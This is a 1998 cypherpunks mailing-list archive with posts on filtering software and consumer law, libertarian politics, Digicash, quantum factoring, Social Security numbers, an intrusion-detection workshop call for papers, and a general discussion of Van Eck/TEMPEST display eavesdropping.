>figured out some criteria a while back in an interesting article. But make
>sure that your "disagreeing with the fact" is not translated into calling
>for disclosure laws. That way lies statism.
>
>--Tim May
>
>
>Just Say No to "Big Brother Inside"
>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May              | Crypto Anarchy: encryption, digital money,
>ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
>W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
>Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 11 Feb 1998 02:26:13 +0800
To: "WebWarrior3@InfoWar.Com>
Subject: Re: Cyber 'Nannys"
In-Reply-To: <v03102804b105af4a91ed@[207.167.93.63]>
Message-ID: <v03007802b10648ad662d@[168.161.105.216]>
MIME-Version: 1.0
Content-Type: text/plain



There are many bad laws on the books. Doesn't mean they're good ones,
WebWarrior3.

Many "consumer protection" laws in truth hurt consumers through more
government regulation, reduced competition, and higher prices.

-Declan


At 03:40 -0500 2/10/98, WebWarrior3@InfoWar.Com wrote:
>Ever hear of consumer protection laws? There are many cases where consumers
>are allowed to "demand" information regarding their purchases...you were being
>flippant. One subscribes to a magazine because one knows what the focus of the
>content is and one chooses to receive that periodical; not because the
>magazine MAY have an editorial policy to not cover any stories on the
>"Oddities of Toenail Fungus in Bleached Blonde Yaks from Manhattan."

>There are already consumer protection laws.  I don't think that this is a
>concentration of extensive economic controls in the State, do you?  Really,
>Tim...
>
>It is neither my option nor is it my responsibility to change someone's little
>paranoid mind should they confuse consumer protection with statism, that is a
>job for a psychiatrist or a professor.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "WebWarrior3@InfoWar.Com" <WebWarrior3@InfoWar.Com>
Date: Wed, 11 Feb 1998 02:47:11 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Cyber 'Nannys"
In-Reply-To: <v03102804b105af4a91ed@[207.167.93.63]>
Message-ID: <34E09E8A.73AF7CAB@InfoWar.Com>
MIME-Version: 1.0
Content-Type: text/plain





Tim May wrote:

> As far as I'm concerned, absent a contract, anyone who "demands" something
> from me is on thin ice.

When you purchase or sell anything you enter into a contract with the other party,
hence:UNIFORM COMMERCIAL CODE Article 21) In this Article unless the context
otherwise requires "contract" and "agreement" are limited to those relating to the
present or future sale of goods. "Contract for sale" includes both a present sale
of goods and a contract to sell goods at a future time. A "sale" consists in the
passing of title from the seller to the buyer for a price (Section 2-401). A
"present sale" means a sale which is accomplished by the making of the contract.

As far as I can tell, every state other than Louisianna have accepted the UCC as
their state business law.  Additionally, many states have a law similar to:

Deceptive Practices SDCL 37-24-6

It is a violation of state law:
(2) To knowingly and intentionally conceal, suppress or omit any material fact in
connection with the sale or advertisement of merchandise.

> Like I said, if you're unhappy that CyberSitter or NetNanny will not
> provide you with information you wish to have, use another service.

I never implied that I would use such trash...I trust that my eight year old my
daughter understands what to do if she comes across something that is not
appropriate for her viewing as far as our family values are concerned. Thanks you
for permission, however, should I ever feel the need to allow a corporation to be
(in your terms) Big Brother to my daughter, I will feel justified in that you have
personally given me the leave to do so.

> But don't cite "Consumer Protection Laws."

Why not?

Scott R. Brower
http://www.infowar.com
http://www.efflorida.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 11 Feb 1998 03:37:16 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Fourier & Signal Analysis...
Message-ID: <199802101939.NAA05111@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

There is one final point I would like to make regarding at least one comment
on Fourier Analysis of signals in a noisy environment.

Fourier signal analysis is not good for this sort of stuff, what you want is
a function called a Laplace Transform.

Fourier is a method to take a complex signal and break it down into
component trigonometric functions (eg sin) such that we can apply filtering
and other frequency dependant operations to the signal to improve the
signals characteristic signature or operate on a particular component (ie a
component that is resonating with something and decreasing the s/n ratio -
ringing on a pulse edge for example).

If you want to find a signal in the noise you want to apply a Laplace. What
it does is convert the amplitude-time variant signal (ie f(t)) into a
power-frequency variant signal (ie f(s)). What this does is take, for example,
a sample of a signal and describe how that signals power is divided between
the various frequencies in that signal (eg McLauren Series). In most
applications the grass of the signal will be evenly distributed across the
s-mapping while the signal (at least its carrier component) itself will show
up as a spike of noticeable amplitude. The reason you do this in signal
analysis is because that transormation function will often be a simpler
equation to solve numericaly that actualy trying to deal with f(t).

So, if you want to find a signal in a complex environment use a Laplace
Transform, once you've found the signal and want to know about its
components use a Fourier Transform.

Good hunting!


    ____________________________________________________________________
   |                                                                    |
   |                   The obvious is sometimes false;                  |
   |                   The unexpected sometimes true.                   |
   |                                                                    |
   |                                       Anonymous                    |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 11 Feb 1998 05:56:33 +0800
To: Tim May <cypherpunks@toad.com>
Subject: Blind signatures dead in the water.  What now?
Message-ID: <199802102142.NAA10762@proxy3.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



    --
At 09:25 AM 2/9/98 -0800, Tim May wrote:
> Sadly, the ideas of David Chaum are more needed than ever,
> but his stuff is essentially nowhere to be seen. (To
> reflect Lucky's comments back to him,
> :-), spare us any citations of how Mark Twain Bank will let
> :some people
> open a cumbersome Digicash account.)

Why are blind signatures dead in the water?

One obvious reason is that people attempting to do business
with  David Chaum seem to get rather irritable.

Still, despite that, Digicash actually exists, but no one
uses it.

One reason is that the network to convert Digicash into
other forms of value is rather limited, whereas the credit
card network is fast and spans the world.

Another is that people do not wish to hold large amounts of
Digicash] for long periods, (security, no interest) and
converting money back and forth between interest bearing
forms and Digicash attracts  rather high charges. (Or used to
attract rather high charges when last I looked.)

So where do we go from here?

One obvious solution is nymous money-- money that is not
anonymous, but is not required to be connected to one's
government approved and  registered name either.  This is
arguably better than the half-anonymous  money that has in
fact been implemented by Digicash.

What nymous money projects are happening, and how are they
going? 

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     LYaOPLZKNwSNWeffnb7uS95ByY1zFrrw5ORiNblo
     4jCWkLjLNXwKCdAtmb4IoOno/9n7A5bv6OhoyZ2Ki
 ---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of 
the kind of animals that we are. True law derives from this right, 
not from the arbitrary power of the state.

http://www.jim.com/jamesd/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 11 Feb 1998 05:54:47 +0800
To: Adam Back <cypherpunks@toad.com>
Subject: Re: FCPUNX:time to learn chinese?
Message-ID: <199802102142.NAA10766@proxy3.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



    --
At 10:24 PM 2/9/98 GMT, Adam Back wrote:
> The interesting aspect of her speculation was on the
> possibility of an economic and political process of change
> which would result in a transition directly from communism
> to a free market based political system, by-passing
> democracy and socialism.  She viewed democracy and 
> socialism as mistakes made by the west to be learned from
> and avoided.

In other words, instead of China taking over Hong Kong, Hong
Kong takes over China.

We shall see.

Right now Hong Kong is being run by some rich capitalist
chinese.

(What else is new, you may ask)

The problem with such systems is that they are vulnerable to
the same disease that struck down Venice.  Rich merchants
aquire state power, soon are tempted by the easy and safe
returns from confiscation and taxation, rather than the
difficulty and risk of commerce, soon become aristocrats,
equally contemptuous of the poor, of real businessmen, and of
earning an honest living. 

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     f/S+Mn40UqaSQjsUULlWtwVMEkmnupDDQNCEyHSC
     44TB2tTSr9ueaMq5FhuDDot2crWmnd7SePUYV0Qux
 ---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of 
the kind of animals that we are. True law derives from this right, 
not from the arbitrary power of the state.

http://www.jim.com/jamesd/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 11 Feb 1998 03:51:29 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: VanEck, Noise, & Palmtops...
Message-ID: <199802101949.NAA05309@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

Palmtops are noisy, this is bad for Van Eck. Van Eck relies on the fact that
the device is emitting display signals significantly above the noise floor
or that there is a method to pull that signal out of the noise.

Considering the power draw of palmtops, while they are noisy they are also
very low power. My guestimate on emitted rf is in the micro-watt range. That
means for a succesful intercept the receiver would need to be in most
situation within feet of the device. It'd be much simpler to simply ask to
see the PDA because you were thinking of buying one than lugging all that
obvious equipment around...

If you want to defeat Van Eck you want either very quite or you want lots of
noise smoothly distributed across the rf spectrum.


    ____________________________________________________________________
   |                                                                    |
   |                   The obvious is sometimes false;                  |
   |                   The unexpected sometimes true.                   |
   |                                                                    |
   |                                       Anonymous                    |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "WebWarrior3@InfoWar.Com" <WebWarrior3@InfoWar.Com>
Date: Wed, 11 Feb 1998 03:06:49 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: Cyber 'Nannys"
In-Reply-To: <v03102804b105af4a91ed@[207.167.93.63]>
Message-ID: <34E0A2B9.F4F4AFA0@InfoWar.Com>
MIME-Version: 1.0
Content-Type: text/plain



Declan McCullagh wrote:

> There are many bad laws on the books. Doesn't mean they're good ones,
> WebWarrior3.
>
> Many "consumer protection" laws in truth hurt consumers through more
> government regulation, reduced competition, and higher prices.
>
> -Declan
>

I do not claim to be a specialist in consumer protection and you may be right that
there are many laws that end up hurting consumers.  I don't know of any, but they
may be there...You mentioned:

Government regulation, as in your car or kerosene heater has to meet certain
criteria before it is sold?

Reduced competition, as in the case where a company wants to produce an item that
is unsafe or does not do what it is supposed to and is not allowed to market it?

Higher prices--I would rather pay a higher price and know that if the product does
not perform as indicated or purported I have recourse than pay less for a product
that does not work and end up being stuck with it.  Ya get what ya pay for (not
including taxes) generally, or you get what you can afford as the case may be. I
seriously doubt that consumer protection laws have kept anyone from being able to
afford a product they would have otherwise been able to enjoy.

Scott R. Brower
http://www.infowar.com
http://www.efflorida.org





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@pathfinder.com>
Date: Wed, 11 Feb 1998 03:31:07 +0800
To: "Michael Sims" <jellicle@inch.com>
Subject: "Corporations selling your ass down the road for a dollar"
In-Reply-To: <v03007800b10647a828e3@[168.161.105.216]>
Message-ID: <v03007807b106593348bc@[168.161.105.216]>
MIME-Version: 1.0
Content-Type: text/plain



At 13:56 -0400 2/10/98, Michael Sims wrote:
>I am aghast.  Why not just pull some "facts" from the National
>Enquirer or another equally reputable source?
>
>I would ask Declan how the hearings went but I suspect there'll be a
>Netly piece involved.

Yep, I'll probably write about this. There are three, maybe four, other
Net-related hearings today, which I won't be able to go to, unfortunately.

>None of this is news to Declan of course.  I just get disappointed
>when I see industry mouthpiece after industry mouthpiece without a
>single goal in mind except maximum profit.  Libertarianism in
>action - corporations sell your ass down the road for a dollar and
>some stock options.

I'm sure Michael was upset and not typing clearly. He knows as well as
anyone that libertarians are not pro-business; they're pro-individual
rights. Libertarians spend quite a bit of time complaining about the
Republican habit of funding corporate subsidies.

The pursuit of profit in the free market is not to be discouraged --
without it, we wouldn't have the Internet we have today. Rather, we should
be suspicious of the intersection between the government and the market in
Congress and in federal agencies. I've written elsewhere about the dangers
of industry sellouts on civil liberties -- sellouts and compromises which
are of course opposed by libertarians.

The libertarian Cato Institute opposes the McCain bill at issue in this
hearing.

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marc Dacier" <dac@zurich.ibm.com>
Date: Tue, 10 Feb 1998 22:25:54 +0800
To: cypherpunks@toad.com
Subject: CFP - Recent Advances in Intrusion Detection (RAID'98)
Message-ID: <9802101505.ZM25870@zurich.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain



		   Call For Participation - RAID'98

		 First International Workshop on the
		Recent Advances in Intrusion Detection

			September 14-15, 1998
		      Louvain-la-Neuve, Belgium

We solicit your participation in the first International Workshop on
the Recent Advances in Intrusion Detection.  This workshop, the first
in an anticipated annual series, will bring together leading figures
from academia, government, and industry to talk about the current
state of intrusion detection technologies and paradigms from the
research and commercial perspectives.

Research into and development of automated intrusion detection systems
(IDS) has been under way for nearly 10 years.  In that time, only a
few systems have been widely deployed in the commercial or government
arena (e.g., DIDS, NADIR, NetRanger, Stalker).  All are limited in
what they do.  At the same time, the numerous research systems
developed have been more engineering than scientific efforts, with
scant quantitative performance figures.  As we survey the field of
automated intrusion detection, we are faced with many questions:

1) What *research* questions have yet to be answered about IDS?
2) What are the open questions, limitations, and fundamental concerns
about existing intrusion detection methodologies?
3) What metrics shall we use to measure IDS performance and thus
compare different IDSes? These measurements should highlight the
successes and expose the limitations of current IDS approaches.
4) What factors are inhibiting transfer of research ideas into
functional deployed IDSes?  How can those be addressed?
5) What is the role of a deployed IDS? How should or can it fit in
with other security systems?
6) What are the typical operating environments and policies in which
IDSes are used?
7) What are the challenges for IDSes in very large environments, such
as the Internet?
8) Is it time to be thinking about IDS standards? What are the
advantages and disadvantages of standardizing components of IDS?  What
forums (e.g., IETF, ISO) would be appropriate for pursuing such
standards?
9) What are the problems of turning the results of intrusion detection
tools into legally reliable evidence?  What are the problems of
admissibility and of court-room presentation?

We invite proposals and panels that explore these questions or any
other aspect of automated intrusion detection. We especially solicit
proposals and panels that address:

1) New results related to intrusion detection methodologies and
technologies.
2) Innovative ways of thinking about intrusion detection; for example,
the applicability of R&D in the fields of survivable and/or dependable
systems, data mining, etc.
3) User experiences and lessons learned from fielded intrusion
detection systems.
4) IDS for emerging computer environments (e.g., Java, CORBA, NT ).
5) Commercial intrusion detection systems.

We have scheduled RAID'98 immediately before ESORICS'98, at the same
time as CARDIS'98, and at the same location as both of these
conferences. This provides a unique opportunity for the members of
these distinct, yet related, communities to participate in all these
events and meet and share ideas during joined organized external
events.

INSTRUCTIONS:

Proposals for presentations must include a title followed by an
abstract that is a maximum of 600 words in length.  The presenter may
include a full paper with the abstract, and will have either 15 or 30
minutes (including questions) for the talk.

Panel proposals should include a title, proposed chair, tentative
panelists, a description (under 300 words), format of the
presentation, and short rationale for the panel.  Panel sessions must
fit into one hour time slots.

Each proposed participant must include his or her name, organization,
position, e-mail address, facsimile and telephone number, and a brief
biography.

All proposals must be in English.  Plan to give all panels and talks
in English.

We must receive all proposals before June 15, 1998.  We strongly
prefer they be submitted by e-mail to raid98@zurich.ibm.com.  Various
formats (ASCII, postscript, Word, WordPro, Framemaker, and LaTex) are
acceptable.  If necessary, hardcopy proposals may be sent to:

Marc Dacier
Global Security Analysis Lab
IBM Zurich Research Laboratory
Saeumerstrasse 4, CH-8803 Rueschlikon, Switzerland

IMPORTANT DATES:
----------------
Deadline for submission:                   June 15, 1998
Notification of acceptance or rejection:   August 1, 1998

GENERAL CO-CHAIRS:
------------------
Marc Dacier (IBM Zurich Research Laboratory, Switzerland)
Kathleen A. Jackson (Los Alamos National Laboratory, USA)

PROGRAM COMMITTEE:
------------------
Matt Bishop (University of California at Davis, USA)
Dick Brackney (National Security Agency, USA)
Yves Deswarte (LAAS-CNRS & INRIA, France)
Baudouin Le Charlier (Universite de Namur, Belgium)
Stuart Staniford-Chen (University of California at Davis, USA)
Rowena Chester (University of Tennessee, USA)
Deborah Frincke (University of Idaho, USA)
Tim Grance (National Institute of Standards and Technology, USA)
Sokratis Katsikas (University of Athens, University of Aegeans, Greece)
Jean-Jacques Quisquater (Universite Catholique de Louvain, Belgium)
Mark Schneider (National Security Agency, USA)
Peter Sommer (London School of Economics & Political Science, England)
Steve Smaha (Trusted Information Systems, USA)
Gene Spafford (Purdue University, USA)
Chris Wee (University of California at Davis, USA)
Kevin Ziese (WheelGroup Corporation, USA)

For further information contact one of the General Co-chairs:

Marc Dacier                     Kathleen A. Jackson
IBM Zurich Research Laboratory  Los Alamos National Laboratory
Switzerland                     USA
E-mail: dac@zurich.ibm.com      E-mail: kaj@lanl.gov
Tel.: +41-1-724-85-62           Tel.: +1-505/667-5927
Fax.: +41-1-724-89-53           Fax: +1-505/665-5220

More information will be available at:
<URL:http://www.zurich.ibm.com/~dac/raid98/>.

Information about ESORICS'98 is available at:
ESORICS 98 home page: <http://www.dice.ucl.ac.be/esorics98>
ESORICS series home page: <http://www.laas.fr/~esorics>
Note: Papers and panel proposals for ESORICS'98 are due before February
28,
1998.

Information about CARDIS'98 will be available at:
<http://www.dice.ucl.ac.be/cardis98>


-- 
Marc Dacier
Mgr. Global Security Analysis Lab (GSAL)
IBM Zurich Research Laboratory
Saeumerstrasse 4 -    CH-8803 Rueschlikon  -   Switzerland
E-mail: dac@zurich.ibm.com   Tel.:+41-1-724-85-62     Fax.:+41-1-724-89-53





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 11 Feb 1998 07:30:19 +0800
To: Jim Choate <cypherpunks@toad.com>
Subject: Re: FCPUNX:comp.html
Message-ID: <199802102310.PAA18375@proxy3.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



    --
At 03:14 PM 1/28/98 -0600, Jim Choate wrote:
>   Recently, an algorithm was developed for factoring
>   numbers on a quantum computer which runs in steps where
>   is small [1]. This is roughly quadratic in the input
>   size, so factoring a 1000 digit number with such an
>   algorithm would require only a few million steps. The 
>   implication is that public key cryptosystems based on
>   factoring may be breakable.

However quantum computers so far envisaged (but not yet
built) can only do a few steps before they lose quantum 
coherence.

So far factoring a four bit number is well beyond the state
of the art in quantum computation. 

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     W7fOL2Uec3TpIWpLT+xcgrKGVfoQL3gmNdcADrkN
     41SXVwnn/Gy+C42ptPxygaLgt1miSt2a1T/6/b9p8
 ---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of 
the kind of animals that we are. True law derives from this right, 
not from the arbitrary power of the state.

http://www.jim.com/jamesd/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 10 Feb 1998 23:23:34 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Driver Licenses
In-Reply-To: <199802100200.VAA03490@deathstar.jabberwock.org>
Message-ID: <199802101512.QAA11271@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



D'jinnie asked:

> Why are religions, no matter how kooky, respected so much??
> 

Amendment I.  Congress shall make no law respecting an establishment of
religion, or prohibiting the free exercise thereof; or abridging the
freedom of speech, or of the press; or the right of the people peaceably
to assemble, and to petition the government for a redress of grievances.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@bsd.adnetsol.com>
Date: Wed, 11 Feb 1998 08:27:31 +0800
To: cypherpunks@cyberpass.net
Subject: Who are the "digerati"?
Message-ID: <199802110014.QAA25295@rigel.cyberpass.net>
MIME-Version: 1.0
Content-Type: text/plain



http://www.edge.org/digerati/index.html

Have you guys seen this?  Any comments?  I thought it was pretty 
interesting.

Ross

=-=-=-=-=-=-
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://ross.adnetsol.com
Voice: (408) 259-2795





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "WebWarrior3@InfoWar.Com" <WebWarrior3@InfoWar.Com>
Date: Wed, 11 Feb 1998 05:38:03 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Cyber 'Nannys"
In-Reply-To: <v03102804b105af4a91ed@[207.167.93.63]>
Message-ID: <34E0C6DD.250A38FB@InfoWar.Com>
MIME-Version: 1.0
Content-Type: text/plain





Tim May wrote:

> I suppose that your point is that the UCC somehow relates to your argument
> that filtering companies must supply customers with their filtering
> criteria?
>
> This is a serious distortion of the UCC, and, if applied, would mean:
>
> -- a chip company would have to provide the internal workings of chips
> sold, else they would be violating the disclosure laws

I hardly think that the parameters they choose to use can be construed as a trade
secret.

> -- a restaurant critic (analagous to a net.nanny filter, essentially) would
> have to provide access to his selection criteria

Restaurant critics do supply criteria, this, once again, is not a trade secret.
What is more, this is not analogous to filtering packages.  A critic will provide
information on both what he or she likes and dislikes as well as the location and
name of the restaurant.  They make recommendations which their 'readers' (not
customers) can choose to follow or ignore.

> -- the editor of any magazine or newspaper would have to explain his
> reasons for reporting some stories and not others, for including some
> editorial remarks and not others, and so on.

As I said before, when one subscribes to a periodical, one has a good idea of
what is within their editorial policy.  It would be unreasonable to expect a
publisher to provide every potential story.  Whereas, it would not be
unreasonable to expect a magazine on Anthropology to publish an article on a
recent discovery of major scientific import.

> My point about "absent a contract" is that sometimes there _are_
> arrangements to supply internal workings of chips, restaurant selection
> criteria, etc. If there are such arrangements, then a customer can sue to
> get performance. But absent such prearrangements, a customer cannot
> generally demand information on how products were built, on what went into
> them, and so on.

Equating a decision of what material is what is not acceptable  with the internal
schematics of chips is really far fetched.

People buy these packages (filtering software/services) with the understanding
that they will 'protect' their children from certain content.  Without being able
to look into what content is actually blocked a customer is being duped into a
false sense of security.  Additionally, they will never get to see what is
actually blocked.

> Except in a few cases (wrongly, I believe) involving food and drug
> products, under FDA rules.

So you don't think that ingredients should be labeled on pre-packaged food?
Shit, I guess you don't have any allergies.

> Importantly, there are absolutely no such
> requirements for labelling of "speech," or editorial decisions, which is
> precisely the service being provided by Cyber Sitter and Net Nanny types of
> services.

But CyberSitter ad Net Nanny DO label their editorial decisions by providing a
list of what TYPE of material they block, and as Declan pointed out, Net Nanny
provides a list.  They simply provide no proof that they actually do block sites
on any such basis.  The CyberSitter fiasco with Jonathan Wallace and Peacefire
last year is an example of material that is being blocked that does not fall into
line with their declared criteria.

> I believe any attempts to force, through law, the disclosure of editorial
> selection criteria would quickly be struck down by the courts as a
> violation of the First Amendment.

As stated above, they DO disclose the framework of their criteria, it is evidence
that these criteria are actually followed that is absent.

Scott R. Brower
http://www.infowar.com
http://www.efflorida.org





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes <jim.burnes@ssds.com>
Date: Wed, 11 Feb 1998 07:51:30 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: FCPUNX:time to learn chinese?
In-Reply-To: <199802102142.NAA10766@proxy3.ba.best.com>
Message-ID: <34E0E694.3A926DD5@ssds.com>
MIME-Version: 1.0
Content-Type: text/plain



James A. Donald wrote:
> The problem with such systems is that they are vulnerable to
> the same disease that struck down Venice.  Rich merchants
> aquire state power, soon are tempted by the easy and safe
> returns from confiscation and taxation, rather than the
> difficulty and risk of commerce, soon become aristocrats,
> equally contemptuous of the poor, of real businessmen, and of
> earning an honest living.
> 

Wouldn't that be fixed if the state lost its monopoly on
power?  Distribute power and the abusers can't have it
all.  While it may be easy to hookwink the masses with
propaganda (without internet/etc), once force monopoly
power withers it will be difficult to convince Joe Blow
to agree to something obviously not in his best interests.

Or something like that...

Jim





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Wed, 11 Feb 1998 05:59:17 +0800
To: "CypherPunks List" <meander-talk@abacus96.com>
Subject: Fwd: Social Security
Message-ID: <199802102151.QAA31482@mx02.together.net>
MIME-Version: 1.0
Content-Type: text/plain




---------------- Begin Forwarded Message ----------------
Date:        02/09  10:25 PM
Received:    02/09  10:29 PM
From:        James A Chappelow, chappja@mail.auburn.edu
Reply-To:    Vermont Libertarian, vtlp-list@catamount.com
To:          Multiple recipients of, vtlp-list@catamount.com

Outside of Birmingham, a kid was arrested Saturday for not giving a cop
his Social Security number. The bumper fell off his truck, so he stuck the
tag in the rear window; not a rare sight in Alabama. He got pulled over
for it. Alabama licenses have the holder's SSN on them (because that way
the state gets more Federal highway $), except his parents had never
applied to get him one, because of their religion. When the cop demanded
his SSN ("Deine Papieren!"), and he didn't tell him one, he was arrested
for disorderly conduct. He's still in jail because in order to bail him
out his parents had to supply their (guess what) SSNs.

Clinton recently declared his intention to use his supposed budget surplus
to save Social Security. In order to maintain Social Security payments, it
is estimated that combined Federal taxes will have to rise to 84% of
national income! Social Security is doomed as a retiremant option; there
is no reason for any able bodied citizen born after 1950 to ever expect to
see any benefits from it. So why should any of those people have SSNs?
Because securing retirement is not the real goal of Social Security.
However, it is still quite valuable as a means for tracking and
controlling people, and it looks like voluntary compliance is now being
strictly enforced. That's why Clinton wants to save Social Security.

James A. Chappelow


---------------------------------------------------
This message is from the VTLP-list (Vermont Libertarian) mailing list. To 
send
a message to everyone on this list send email to 
<vtlp-list@catamount.com>. To
unsubscribe from the list send email to <listserv@catamount.com> with
"unsubscribe vtlp-list" in the body of the message. To subscribe to the 
list
send email to <listserv@catamount.com> with "subscribe vtlp-list your 
name" in
the body of the message.

 


----------------- End Forwarded Message -----------------

Brian B. Riley --> http://members.macconnect.com/~brianbr
 For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

 "Everyone has a photographic memory. Some just don't have film."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 11 Feb 1998 07:22:30 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: FCPUNX:comp.html (fwd)
Message-ID: <199802102323.RAA06408@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 10 Feb 1998 15:10:08 -0800 (PST)
> From: "James A. Donald" <jamesd@echeque.com>
> Subject: Re: FCPUNX:comp.html

> However quantum computers so far envisaged (but not yet
> built) can only do a few steps before they lose quantum 
> coherence.
> 
> So far factoring a four bit number is well beyond the state
> of the art in quantum computation. 

I only have two things to say to this:

 - This year.

 - Quantum Coupled Architectures


    ____________________________________________________________________
   |                                                                    |
   |                   The obvious is sometimes false;                  |
   |                   The unexpected sometimes true.                   |
   |                                                                    |
   |                                       Anonymous                    |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Markus Kuhn <Markus.Kuhn@cl.cam.ac.uk>
Date: Wed, 11 Feb 1998 02:40:58 +0800
To: cypherpunks@ssz.com
Subject: Re: TEMPEST
In-Reply-To: <199802100340.VAA27056@einstein.ssz.com>
Message-ID: <E0y2KTu-0000y4-00@heaton.cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote on 1998-02-10 03:40 UTC:
> 11MHz base frequency won't produce a clean ring at 125MHz or 210MHz, they're
> not a whole number multiple of the base. How is this accounted for? What did
> he calculate the Q at? At what range was he picking up these harmonics as
> well as the base? The lower harmonic implies a 4MHz beat and the higher a
> 1MHz beat, how did he account for these signals? Personaly I would be more
> inclined to suspect the information was riding on the beats. He didn't
> happen to measure the frequencies to 3 decimal places did he?

You might want to consider to read van Ecks paper yourself:

  Wim van Eck: Electromagnetic Radiation from Video Display Units: An
  Eavesdropping Risk? Computers & Security 4 (1985) 269--286

If you don't have C&S in your library, you might also find a
scan on <http://www.eskimo.com/~joelm/tempest.html>

> > If you have only a van Eck style receiver, yes. But as soon as you record
> > the reception over some time and observe the images phases to drift only
> > slightly against each other, you might be able to separate them using
> > similar processing techniques as used in computer tomography.
> 
> As I alluded to with the comment I made about integrating the received
> signals. The easiest way to do this sort of stuff with a small budget is
> with a flying capacitor integrator.

Please explain! I was more thinking in terms of digitizing everything
and solving large per-pixel systems of equations to separate the drifting
images, which does not sound much like something equivalent to a
single hardware integrator, but more like something that keeps a
workstation very busy for a few minutes.

Markus

-- 
Markus G. Kuhn, Security Group, Computer Lab, Cambridge University, UK
email: mkuhn at acm.org,  home page: <http://www.cl.cam.ac.uk/~mgk25/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <jmr@shopmiami.com>
Date: Wed, 11 Feb 1998 07:43:00 +0800
To: fight-censorship@vorlon.mit.edu
Subject: Re: "Corporations selling your ass down the road for a dollar"
Message-ID: <3.0.16.19980210183307.0a6fec02@pop.gate.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

At 02:28 PM 2/10/98 -0500, Declan McCullagh wrote:
...
>I'm sure Michael was upset and not typing clearly. He knows as well as
>anyone that libertarians are not pro-business; they're pro-individual
>rights. Libertarians spend quite a bit of time complaining about the
>Republican habit of funding corporate subsidies.
...

In view of his constant spewing of lies to the contrary, I'm beginning
